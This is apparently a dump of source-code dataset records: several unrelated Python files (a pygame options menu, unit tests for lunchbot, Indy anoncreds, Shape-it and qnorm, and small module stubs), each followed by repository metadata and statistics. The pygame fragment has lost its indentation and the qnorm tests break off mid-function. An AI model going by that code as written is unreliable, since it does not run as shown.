game.music_volume = round(min([game.music_volume + 0.1, 1]), 1)
pygame.mixer.music.set_volume(game.music_volume)
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Musik -"]):
game.music_volume = round(max([game.music_volume - 0.1, 0]), 1)
pygame.mixer.music.set_volume(game.music_volume)
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Sounds +"]):
game.sound_volume = round(min([game.sound_volume + 0.1, 1]), 1)
change_sound_volume(game.sound_volume)
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Sounds -"]):
game.sound_volume = round(max([game.sound_volume - 0.1, 0]), 1)
change_sound_volume(game.sound_volume)
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Tastatur"]):
if game.use_tastatur and len(game.all_joysticks) > 0:
game.use_tastatur = False
else:
game.use_tastatur = True
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Maus"]):
if game.with_maussteuerung:
game.with_maussteuerung = False
else:
game.with_maussteuerung = True
for count, joystick in enumerate(maus_rects["Joystick"]):
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], joystick):
if game.all_joysticks[count] in game.used_joysticks:
del game.used_joysticks[game.used_joysticks.index(game.all_joysticks[count])]
else:
game.used_joysticks.append(game.all_joysticks[count])
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["Fenstergroesse"]):
anz_players = len(game.used_joysticks)
if game.use_tastatur:
anz_players += 1
if anz_players >= 1:
resize_window(game,anz_players * 960, 640)
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], maus_rects["zurueck"]):
if game.use_tastatur or len(game.used_joysticks) >= 1:
anz_players = len(game.used_joysticks)
if game.use_tastatur:
anz_players += 1
if anz_players > 1:
game.multiplayer = True
game.num_players_in_multiplayer = anz_players
else:
game.multiplayer = False
break
if game.check_key_in_pressed(pygame.K_UP, pressed) and time() - time_last_cursor_change > 0.4:
time_last_cursor_change = time()
cursor_pos[0] = max([cursor_pos[0] - 1, 0])
if game.check_key_in_pressed(pygame.K_DOWN, pressed) and time() - time_last_cursor_change > 0.4:
time_last_cursor_change = time()
cursor_pos[0] = min([cursor_pos[0] + 1, len(game.all_joysticks) + 4])
if game.check_key_in_pressed(pygame.K_LEFT, pressed) and time() - time_last_cursor_change > 0.4:
time_last_cursor_change = time()
cursor_pos[1] = max([cursor_pos[1] - 1, 0])
if game.check_key_in_pressed(pygame.K_RIGHT, pressed) and time() - time_last_cursor_change > 0.4:
time_last_cursor_change = time()
cursor_pos[1] = min([cursor_pos[1] + 1, 1])
if (game.check_key_in_pressed(pygame.K_s, pressed) or game.check_key_in_pressed(pygame.K_d, pressed)) and time() - time_last_cursor_change > 0.4:
time_last_cursor_change = time()
if cursor_pos[0] == 0:
if game.schoene_grafik:
game.schoene_grafik = False
else:
game.schoene_grafik = True
elif cursor_pos[0] == 1:
if cursor_pos[1] == 0:
game.music_volume = round(max([game.music_volume - 0.1,0]),1)
else:
game.music_volume = round(min([game.music_volume + 0.1, 1]),1)
pygame.mixer.music.set_volume(game.music_volume)
elif cursor_pos[0] == 2:
if cursor_pos[1] == 0:
game.sound_volume = round(max([game.sound_volume - 0.1, 0]), 1)
else:
game.sound_volume = round(min([game.sound_volume + 0.1, 1]), 1)
change_sound_volume(game.sound_volume)
elif cursor_pos[0] == 3:
if cursor_pos[1] == 0 and len(game.all_joysticks) > 0:
if game.use_tastatur:
game.use_tastatur = False
else:
game.use_tastatur = True
if cursor_pos[1] == 1 or len(game.all_joysticks) == 0:
if game.with_maussteuerung:
game.with_maussteuerung = False
else:
game.with_maussteuerung = True
elif cursor_pos[0] == len(game.all_joysticks) + 4:
anz_players = len(game.used_joysticks)
if game.use_tastatur:
anz_players += 1
if 1 <= anz_players <= 4:
if game.WIDTH != [960, 1300, 2200, 3500, 4000][anz_players - 1] or game.HEIGHT != 640:
resize_window(game,[960, 1500, 2800, 4500, 7000][anz_players - 1], 640)
else:
if game.all_joysticks[cursor_pos[0] - 4] in game.used_joysticks:
del game.used_joysticks[game.used_joysticks.index(game.all_joysticks[cursor_pos[0] - 4])]
else:
game.used_joysticks.append(game.all_joysticks[cursor_pos[0] - 4])
if game.check_key_in_pressed(pygame.K_RETURN, pressed) or game.check_key_in_pressed(pygame.K_a, pressed):
if game.use_tastatur or len(game.used_joysticks) >= 1:
anz_players = len(game.used_joysticks)
if game.use_tastatur:
anz_players += 1
if anz_players > 1:
game.multiplayer = True
game.num_players_in_multiplayer = anz_players
else:
game.multiplayer = False
break
# Spielerklaerung
def make_spielerklaerung(game):
while True:
game.screen.blit(game.background, (0, 0))
orig_width = ERKLAERUNG.get_width()
orig_height = ERKLAERUNG.get_height()
width = int(game.WIDTH)
if orig_width / width < orig_height / game.HEIGHT:
height = int(game.HEIGHT)
width = int(orig_width * (game.HEIGHT / orig_height))
pos = (int((game.WIDTH - width) / 2), 0)
game.screen.blit(pygame.transform.scale(ERKLAERUNG, (width, height)), pos)
else:
height = int(orig_height * (width / orig_width))
pos = (0, int((game.HEIGHT - height) / 2))
game.screen.blit(pygame.transform.scale(ERKLAERUNG, (width, height)), pos)
pygame.display.flip()
game.clock.tick(FPS)
pressed = game.check_key_or_mouse_pressed([pygame.K_RETURN, pygame.K_a])
if game.check_key_in_pressed(pygame.K_RETURN, pressed) or game.check_key_in_pressed(pygame.K_a, pressed):
break
if MAUS_LEFT in pressed["Tastatur"]:
if game.check_maus_pos_on_rect(pressed["Tastatur"][MAUS_LEFT], pygame.Rect((int(pos[0] + (width / 2) - (0.3 * width)), int(pos[1] + height - 0.3 * height)), (int(0.6 * width), int(0.6 * height)))):
break
for joystick in game.all_joysticks:
if joystick.get_A() or joystick.get_Y() or joystick.get_select() or joystick.get_start() or joystick.get_shoulder_left() or joystick.get_shoulder_right() or joystick.get_axis_left() or joystick.get_axis_right():
break | 67.833784 | 255 | 0.645278 | 6,991 | 50,197 | 4.364039 | 0.044486 | 0.047724 | 0.040906 | 0.044053 | 0.866203 | 0.825166 | 0.807336 | 0.792586 | 0.757613 | 0.752237 | 0 | 0.026789 | 0.229575 | 50,197 | 740 | 256 | 67.833784 | 0.762108 | 0.012551 | 0 | 0.487342 | 0 | 0 | 0.057165 | 0.002745 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014241 | false | 0.022152 | 0.006329 | 0 | 0.031646 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3fbf94a5db80ced95ab5c22a5cac40e2166f4423 | 301 | py | Python | lunchbot/tests/test_calendar.py | vekerdyb/lunchbot | 5975ff284624117d88a4978ae3e784c03ae0114a | [
"MIT"
] | 2 | 2019-05-10T09:07:51.000Z | 2019-06-27T09:54:57.000Z | lunchbot/tests/test_calendar.py | vekerdyb/lunchbot | 5975ff284624117d88a4978ae3e784c03ae0114a | [
"MIT"
] | 2 | 2020-07-16T21:31:59.000Z | 2021-05-08T11:26:27.000Z | lunchbot/tests/test_calendar.py | vekerdyb/lunchbot | 5975ff284624117d88a4978ae3e784c03ae0114a | [
"MIT"
] | 1 | 2019-06-27T08:56:07.000Z | 2019-06-27T08:56:07.000Z | from lunchbot.calendar import get_last_friday_of_month
def test_get_last_friday_of_month():
assert 28 == get_last_friday_of_month(2018, 12)
assert 30 == get_last_friday_of_month(2018, 11)
assert 26 == get_last_friday_of_month(2018, 10)
assert 28 == get_last_friday_of_month(2018, 9)
| 33.444444 | 54 | 0.774086 | 52 | 301 | 4 | 0.384615 | 0.201923 | 0.375 | 0.432692 | 0.730769 | 0.538462 | 0.307692 | 0.307692 | 0 | 0 | 0 | 0.120623 | 0.146179 | 301 | 8 | 55 | 37.625 | 0.688716 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0.166667 | true | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3fc50cc13c0e2ce732dec790dedec97854da2d77 | 3,810 | py | Python | wrappers/python/tests/anoncreds/test_prover_get_claim_offers.py | zhigunenko-dsr/indy-sdk | 25b7635b656344675b8ba6bf43f4a8a97875698d | [
"Apache-2.0"
] | null | null | null | wrappers/python/tests/anoncreds/test_prover_get_claim_offers.py | zhigunenko-dsr/indy-sdk | 25b7635b656344675b8ba6bf43f4a8a97875698d | [
"Apache-2.0"
] | null | null | null | wrappers/python/tests/anoncreds/test_prover_get_claim_offers.py | zhigunenko-dsr/indy-sdk | 25b7635b656344675b8ba6bf43f4a8a97875698d | [
"Apache-2.0"
] | null | null | null | from indy.anoncreds import prover_get_claim_offers
from indy.error import ErrorCode, IndyError
import json
import pytest
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_get_claim_offers_works_for_empty_filter(wallet_handle, prepopulated_wallet):
claim_offers = json.loads(
await prover_get_claim_offers(wallet_handle, "{}"))
assert len(claim_offers) == 3
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_get_claim_offers_works_for_filter_by_issuer(wallet_handle, prepopulated_wallet, issuer_did,
schema_key, xyz_schema_key):
claim_offers = json.loads(
await prover_get_claim_offers(wallet_handle, json.dumps({"issuer_did": issuer_did})))
assert len(claim_offers) == 2
claim_offers = claim_offers_info(claim_offers)
assert {"issuer_did": issuer_did, "schema_key": schema_key} in claim_offers
assert {"issuer_did": issuer_did, "schema_key": xyz_schema_key} in claim_offers
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_get_claim_offers_works_for_filter_by_schema(wallet_handle, prepopulated_wallet, issuer_did,
prover_did, xyz_schema_key):
claim_offers = json.loads(
await prover_get_claim_offers(
wallet_handle, json.dumps({"schema_key": {"name": "xyz"}})))
assert len(claim_offers) == 1
claim_offers = claim_offers_info(claim_offers)
assert {'issuer_did': issuer_did, 'schema_key': xyz_schema_key} in claim_offers
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_get_claim_offers_works_for_filter_by_part_of_schema(wallet_handle, prepopulated_wallet,
issuer_did, prover_did, xyz_schema_key):
claim_offers = json.loads(
await prover_get_claim_offers(
wallet_handle, json.dumps({"schema_key": xyz_schema_key})))
assert len(claim_offers) == 1
claim_offers = claim_offers_info(claim_offers)
assert {'issuer_did': issuer_did, 'schema_key': xyz_schema_key} in claim_offers
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_get_claim_offers_works_for_filter_by_issuer_and_schema(wallet_handle, prepopulated_wallet,
issuer_did, schema_key,
claim_offer_issuer_1_schema_1_json):
claim_offers = json.loads(
await prover_get_claim_offers(wallet_handle, claim_offer_issuer_1_schema_1_json))
assert len(claim_offers) == 1
claim_offers = claim_offers_info(claim_offers)
assert {'issuer_did': issuer_did, 'schema_key': schema_key} in claim_offers
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_get_claim_offers_works_for_no_results(wallet_handle, prepopulated_wallet, schema_key, issuer_did):
claim_offers = json.loads(
await prover_get_claim_offers( wallet_handle, json.dumps({"issuer_did": issuer_did + 'a'})))
assert len(claim_offers) == 0
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_get_claim_offers_works_for_invalid_wallet_handle(wallet_handle, prepopulated_wallet, schema_key):
invalid_wallet_handle = wallet_handle + 100
with pytest.raises(IndyError) as e:
await prover_get_claim_offers(invalid_wallet_handle, json.dumps({"schema_key": schema_key}))
assert ErrorCode.WalletInvalidHandle == e.value.error_code
def claim_offers_info(claim_offers):
return [{"issuer_did": claim_offer['issuer_did'], "schema_key": claim_offer['schema_key']}
for claim_offer in claim_offers]
| 41.413043 | 120 | 0.713123 | 483 | 3,810 | 5.167702 | 0.128364 | 0.207131 | 0.084135 | 0.120192 | 0.839744 | 0.794471 | 0.739984 | 0.715144 | 0.676683 | 0.676683 | 0 | 0.004328 | 0.211549 | 3,810 | 91 | 121 | 41.868132 | 0.826565 | 0.049344 | 0 | 0.40678 | 0 | 0 | 0.05534 | 0 | 0 | 0 | 0 | 0 | 0.20339 | 1 | 0.016949 | false | 0 | 0.067797 | 0.016949 | 0.101695 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b750866ecd24e2e9b62273fcc50cc4bcf411b121 | 248 | py | Python | examples/starkex-cairo/starkware/cairo/lang/vm/crypto.py | LatticeLabVentures/BeamNet | e4a755dbc52b4eaef73074b22d4431df88394b4a | [
"CC0-1.0"
] | null | null | null | examples/starkex-cairo/starkware/cairo/lang/vm/crypto.py | LatticeLabVentures/BeamNet | e4a755dbc52b4eaef73074b22d4431df88394b4a | [
"CC0-1.0"
] | null | null | null | examples/starkex-cairo/starkware/cairo/lang/vm/crypto.py | LatticeLabVentures/BeamNet | e4a755dbc52b4eaef73074b22d4431df88394b4a | [
"CC0-1.0"
] | null | null | null | import contextlib
from starkware.crypto.signature import verify as verify_ecdsa # noqa
from starkware.crypto.signature.fast_pedersen_hash import pedersen_hash # noqa
def get_crypto_lib_context_manager(flavor):
return contextlib.suppress()
| 27.555556 | 79 | 0.830645 | 33 | 248 | 6 | 0.636364 | 0.131313 | 0.191919 | 0.282828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116935 | 248 | 8 | 80 | 31 | 0.90411 | 0.03629 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.6 | 0.2 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
b753448cd88c78e38e0275267062db7b06f71263 | 6,504 | py | Python | pyshapeit/basic_test.py | silicos-it/shape-it | d9850ce7b0d3d5f2e0c928501ea5a86b9d2eb421 | [
"MIT"
] | 23 | 2021-01-15T06:04:40.000Z | 2022-03-23T08:13:13.000Z | pyshapeit/basic_test.py | silicos-it/shape-it | d9850ce7b0d3d5f2e0c928501ea5a86b9d2eb421 | [
"MIT"
] | 3 | 2021-01-14T00:02:37.000Z | 2021-12-15T14:58:40.000Z | pyshapeit/basic_test.py | silicos-it/shape-it | d9850ce7b0d3d5f2e0c928501ea5a86b9d2eb421 | [
"MIT"
] | 8 | 2021-01-15T09:12:50.000Z | 2022-01-30T13:05:09.000Z | #
# Copyright 2021 by Greg Landrum and the Shape-it contributors
#
# This file is part of Shape-it.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from rdkit import Chem
from rdkit.Chem import rdMolAlign
import cpyshapeit
import unittest
class TestCase(unittest.TestCase):
def testMols(self):
ref = Chem.MolFromMolBlock('''3l5u_lig_ZEC
3D
Structure written by MMmdl.
20 21 0 0 1 0 999 V2000
15.0500 -34.9220 -18.1430 O 0 0 0 0 0 0
14.9110 -34.7040 -19.4790 C 0 0 0 0 0 0
14.7350 -35.7750 -20.3500 C 0 0 0 0 0 0
14.6060 -35.5430 -21.7160 C 0 0 0 0 0 0
14.3620 -36.6080 -23.0370 S 0 0 0 0 0 0
14.3210 -35.3400 -24.1850 C 0 0 0 0 0 0
14.0030 -35.5290 -25.8940 S 0 0 0 0 0 0
15.1750 -34.7990 -26.7570 N 0 0 0 0 0 0
12.6760 -34.9070 -26.2170 O 0 0 0 0 0 0
13.9630 -36.9930 -26.2180 O 0 0 0 0 0 0
14.4970 -34.1790 -23.5590 N 0 0 0 0 0 0
14.6510 -34.2470 -22.2350 C 0 0 0 0 0 0
14.8270 -33.1870 -21.3480 C 0 0 0 0 0 0
14.9560 -33.4070 -19.9800 C 0 0 0 0 0 0
15.1610 -34.0820 -17.6920 H 0 0 0 0 0 0
14.6990 -36.7830 -19.9650 H 0 0 0 0 0 0
15.1440 -34.8130 -27.7660 H 0 0 0 0 0 0
15.9340 -34.3310 -26.2820 H 0 0 0 0 0 0
14.8640 -32.1730 -21.7190 H 0 0 0 0 0 0
15.0910 -32.5720 -19.3090 H 0 0 0 0 0 0
1 2 1 0 0 0
1 15 1 0 0 0
2 3 2 0 0 0
2 14 1 0 0 0
3 4 1 0 0 0
3 16 1 0 0 0
4 5 1 0 0 0
4 12 2 0 0 0
5 6 1 0 0 0
6 7 1 0 0 0
6 11 2 0 0 0
7 8 1 0 0 0
7 9 2 0 0 0
7 10 2 0 0 0
8 17 1 0 0 0
8 18 1 0 0 0
11 12 1 0 0 0
12 13 1 0 0 0
13 14 2 0 0 0
13 19 1 0 0 0
14 20 1 0 0 0
M END''')
probe = Chem.MolFromMolBlock('''3hof_lig_DHC
3D
Structure written by MMmdl.
20 20 0 0 1 0 999 V2000
14.6290 -34.5170 -18.4190 C 0 0 0 0 0 0
15.6070 -34.6620 -17.5400 O 0 0 0 0 0 0
14.9220 -34.5200 -19.8370 C 0 0 0 0 0 0
14.7370 -35.7220 -20.3520 C 0 0 0 0 0 0
14.9680 -35.9740 -21.7740 C 0 0 0 0 0 0
14.8780 -34.9380 -22.6930 C 0 0 0 0 0 0
15.1020 -35.2380 -24.0360 C 0 0 0 0 0 0
15.4390 -36.6310 -24.4550 C 0 0 0 0 0 0
15.5160 -37.6070 -23.4830 C 0 0 0 0 0 0
15.2760 -37.2740 -22.1560 C 0 0 0 0 0 0
15.6830 -36.9520 -25.7670 O 0 0 0 0 0 0
15.0160 -34.2570 -24.9550 O 0 0 0 0 0 0
13.4860 -34.4200 -18.0300 O 0 5 0 0 0 0
15.2430 -33.6100 -20.3240 H 0 0 0 0 0 0
14.4110 -36.5360 -19.7210 H 0 0 0 0 0 0
14.6410 -33.9380 -22.3590 H 0 0 0 0 0 0
15.7620 -38.6220 -23.7550 H 0 0 0 0 0 0
15.3330 -38.0570 -21.4140 H 0 0 0 0 0 0
15.1950 -34.6170 -25.8260 H 0 0 0 0 0 0
15.8806 -37.8889 -25.8363 H 0 0 0 0 0 0
1 2 2 0 0 0
1 3 1 0 0 0
1 13 1 0 0 0
3 4 2 0 0 0
3 14 1 0 0 0
4 5 1 0 0 0
4 15 1 0 0 0
5 6 2 0 0 0
5 10 1 0 0 0
6 7 1 0 0 0
6 16 1 0 0 0
7 8 2 0 0 0
7 12 1 0 0 0
8 9 1 0 0 0
8 11 1 0 0 0
9 10 2 0 0 0
9 17 1 0 0 0
10 18 1 0 0 0
11 20 1 0 0 0
12 19 1 0 0 0
M CHG 1 13 -1
M END''')
tmp = Chem.Mol(probe)
score = cpyshapeit.AlignMol(ref, tmp)
self.assertAlmostEqual(score, 0.647, 3)
expected = Chem.MolFromMolBlock('''3hof_lig_DHC
RDKit 3D
13 13 0 0 1 0 0 0 0 0999 V2000
13.8351 -36.1391 -27.1202 C 0 0 0 0 0 0 0 0 0 0 0 0
12.7314 -36.7492 -27.5199 O 0 0 0 0 0 0 0 0 0 0 0 0
13.8607 -35.4455 -25.8495 C 0 0 0 0 0 0 0 0 0 0 0 0
14.3613 -36.2184 -24.9028 C 0 0 0 0 0 0 0 0 0 0 0 0
14.4913 -35.7352 -23.5285 C 0 0 0 0 0 0 0 0 0 0 0 0
14.5939 -34.3755 -23.2705 C 0 0 0 0 0 0 0 0 0 0 0 0
14.7220 -33.9730 -21.9418 C 0 0 0 0 0 0 0 0 0 0 0 0
14.7341 -34.9830 -20.8422 C 0 0 0 0 0 0 0 0 0 0 0 0
14.6219 -36.3168 -21.1765 C 0 0 0 0 0 0 0 0 0 0 0 0
14.5069 -36.6821 -22.5117 C 0 0 0 0 0 0 0 0 0 0 0 0
14.8399 -34.6151 -19.5241 O 0 0 0 0 0 0 0 0 0 0 0 0
14.8305 -32.6610 -21.6569 O 0 0 0 0 0 0 0 0 0 0 0 0
14.8316 -36.1976 -27.8063 O 0 0 0 0 0 0 0 0 0 0 0 0
1 2 2 0
1 3 1 0
1 13 1 0
3 4 2 0
4 5 1 0
5 6 2 0
5 10 1 0
6 7 1 0
7 8 2 0
7 12 1 0
8 9 1 0
8 11 1 0
9 10 2 0
M CHG 1 13 -1
M END
''')
ssd = 0.0
probeConf = probe.GetConformer()
expectedConf = expected.GetConformer()
for i in range(probeConf.GetNumAtoms()):
delt = probeConf.GetAtomPosition(i) - expectedConf.GetAtomPosition(
i)
ssd += delt.LengthSq()
self.assertGreater(ssd, 100)
ssd = 0.0
probeConf = tmp.GetConformer()
expectedConf = expected.GetConformer()
for i in range(probeConf.GetNumAtoms()):
delt = probeConf.GetAtomPosition(i) - expectedConf.GetAtomPosition(
i)
ssd += delt.LengthSq()
self.assertAlmostEqual(ssd, 0, 3)
| 36.954545 | 82 | 0.532134 | 1,412 | 6,504 | 2.446884 | 0.242918 | 0.249493 | 0.28741 | 0.273227 | 0.37974 | 0.29754 | 0.26686 | 0.252677 | 0.161795 | 0.1589 | 0 | 0.452521 | 0.399293 | 6,504 | 175 | 83 | 37.165714 | 0.431789 | 0.170972 | 0 | 0.161074 | 0 | 0.087248 | 0.79702 | 0 | 0 | 0 | 0 | 0 | 0.020134 | 1 | 0.006711 | false | 0 | 0.026846 | 0 | 0.040268 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b7c10f5e46da12071fae55f68e0112b5f0bbe454 | 105 | py | Python | venv/Lib/site-packages/pandas/tests/extension/json/__init__.py | OliviaNabbosa89/Disaster_Responses | 1e66d77c303cec685dfc2ca94f4fca4cc9400570 | [
"MIT"
] | 1 | 2021-02-06T21:00:00.000Z | 2021-02-06T21:00:00.000Z | venv/Lib/site-packages/pandas/tests/extension/json/__init__.py | OliviaNabbosa89/Disaster_Responses | 1e66d77c303cec685dfc2ca94f4fca4cc9400570 | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pandas/tests/extension/json/__init__.py | OliviaNabbosa89/Disaster_Responses | 1e66d77c303cec685dfc2ca94f4fca4cc9400570 | [
"MIT"
] | 1 | 2021-04-26T22:41:56.000Z | 2021-04-26T22:41:56.000Z | from .array import JSONArray, JSONDtype, make_data
__all__ = ["JSONArray", "JSONDtype", "make_data"]
| 26.25 | 51 | 0.72381 | 12 | 105 | 5.833333 | 0.666667 | 0.514286 | 0.628571 | 0.742857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 105 | 3 | 52 | 35 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0.264706 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b7c452a86a8e11d1a54abdfb4f99a2a852bc8682 | 17,409 | py | Python | tests/test_qnorm.py | Maarten-vd-Sande/qnorm | d192101f352f78a062a89ed893000439c7bf30a2 | [
"MIT"
] | 13 | 2020-07-29T10:59:14.000Z | 2021-11-04T17:48:30.000Z | tests/test_qnorm.py | Maarten-vd-Sande/qnorm | d192101f352f78a062a89ed893000439c7bf30a2 | [
"MIT"
] | 3 | 2020-10-06T09:33:40.000Z | 2021-10-03T09:40:01.000Z | tests/test_qnorm.py | Maarten-vd-Sande/qnorm | d192101f352f78a062a89ed893000439c7bf30a2 | [
"MIT"
] | 1 | 2022-01-22T13:12:15.000Z | 2022-01-22T13:12:15.000Z | #!/usr/bin/env python
"""Tests for `qnorm` package."""
import unittest
import numpy as np
import pandas as pd
import qnorm
import tracemalloc
tracemalloc.start()
df1 = pd.DataFrame(
{
"C1": {"A": 5.0, "B": 2.0, "C": 3.0, "D": 4.0},
"C2": {"A": 4.0, "B": 1.0, "C": 4.0, "D": 2.0},
"C3": {"A": 3.0, "B": 4.0, "C": 6.0, "D": 8.0},
}
)
df1.to_csv("test.csv")
df1.to_hdf("test.hdf", key="qnorm", format="table", data_columns=True, mode="w")
df1.to_parquet("test.parquet")
class TestQnorm(unittest.TestCase):
def test_000_numpy(self):
"""
test numpy support
"""
arr = np.random.normal(size=(20, 2))
qnorm.quantile_normalize(arr)
def test_001_pandas(self):
"""
test pandas support
"""
df = pd.DataFrame(
{
"C1": {"A": 5.0, "B": 2.0, "C": 3.0, "D": 4.0},
"C2": {"A": 4.0, "B": 1.0, "C": 4.0, "D": 2.0},
"C3": {"A": 3.0, "B": 4.0, "C": 6.0, "D": 8.0},
}
)
qnorm.quantile_normalize(df)
def test_002_wiki(self):
"""
test the wiki example
https://en.wikipedia.org/wiki/Quantile_normalization
"""
df = pd.DataFrame(
{
"C1": {"A": 5.0, "B": 2.0, "C": 3.0, "D": 4.0},
"C2": {"A": 4.0, "B": 1.0, "C": 4.0, "D": 2.0},
"C3": {"A": 3.0, "B": 4.0, "C": 6.0, "D": 8.0},
}
)
result = np.array(
[
[5.66666667, 5.16666667, 2.0],
[2.0, 2.0, 3.0],
[3.0, 5.16666667, 4.66666667],
[4.66666667, 3.0, 5.66666667],
]
)
np.testing.assert_array_almost_equal(
qnorm.quantile_normalize(df).values, result
)
def test_003_no_change(self):
"""
no sorting should happen here
"""
arr = np.empty(shape=(20, 3))
for col in range(arr.shape[1]):
vals = np.arange(arr.shape[0])
np.random.shuffle(vals)
arr[:, col] = vals
qnorm_arr = qnorm.quantile_normalize(arr)
np.testing.assert_array_almost_equal(arr, qnorm_arr)
def test_004_double(self):
"""
if dtype is double, return double
"""
arr = np.random.normal(0, 1, size=(20, 3))
arr = arr.astype(np.float64)
qnorm_arr = qnorm.quantile_normalize(arr)
assert qnorm_arr.dtype == np.float64
def test_005_single(self):
"""
if dtype is single, return single
"""
arr = np.random.normal(0, 1, size=(20, 3))
arr = arr.astype(np.float32)
qnorm_arr = qnorm.quantile_normalize(arr)
assert qnorm_arr.dtype == np.float32
def test_006_target(self):
"""
test if the target is used instead of the qnorm values
"""
arr = np.array([np.arange(0, 10), np.arange(0, 10)]).T
np.random.shuffle(arr)
target = np.arange(10, 20)
qnorm_arr = qnorm.quantile_normalize(arr, target=target)
for val in target:
assert (
val in qnorm_arr[:, 0] and val in qnorm_arr[:, 1]
), f"value {val} not in qnorm array"
def test_007_target_notsorted(self):
"""
make sure an unsorted target gets sorted first
"""
arr = np.array([np.arange(0, 10), np.arange(0, 10)]).T
np.random.shuffle(arr)
# take the reverse, which should be sorted by qnorm
target = np.arange(10, 20)[::-1]
qnorm_arr = qnorm.quantile_normalize(arr, target=target)
for val in target:
assert (
val in qnorm_arr[:, 0] and val in qnorm_arr[:, 1]
), f"value {val} not in qnorm array"
def test_008_short_target(self):
"""
test if an error is raised with a invalid sized target
"""
arr = np.array([np.arange(0, 10), np.arange(0, 10)]).T
target = np.arange(10, 15)
self.assertRaises(ValueError, qnorm.quantile_normalize, arr, target)
def test_009_wiki_ncpus(self):
"""
test if an error is raised with a invalid sized target
"""
df = pd.DataFrame(
{
"C1": {"A": 5.0, "B": 2.0, "C": 3.0, "D": 4.0},
"C2": {"A": 4.0, "B": 1.0, "C": 4.0, "D": 2.0},
"C3": {"A": 3.0, "B": 4.0, "C": 6.0, "D": 8.0},
}
)
result = np.array(
[
[5.66666667, 5.16666667, 2.0],
[2.0, 2.0, 3.0],
[3.0, 5.16666667, 4.66666667],
[4.66666667, 3.0, 5.66666667],
]
)
np.testing.assert_array_almost_equal(
qnorm.quantile_normalize(df, ncpus=10).values, result
)
def test_010_axis_numpy(self):
"""
test numpy axis support
"""
arr = np.random.normal(size=(50, 4))
np.testing.assert_array_almost_equal(
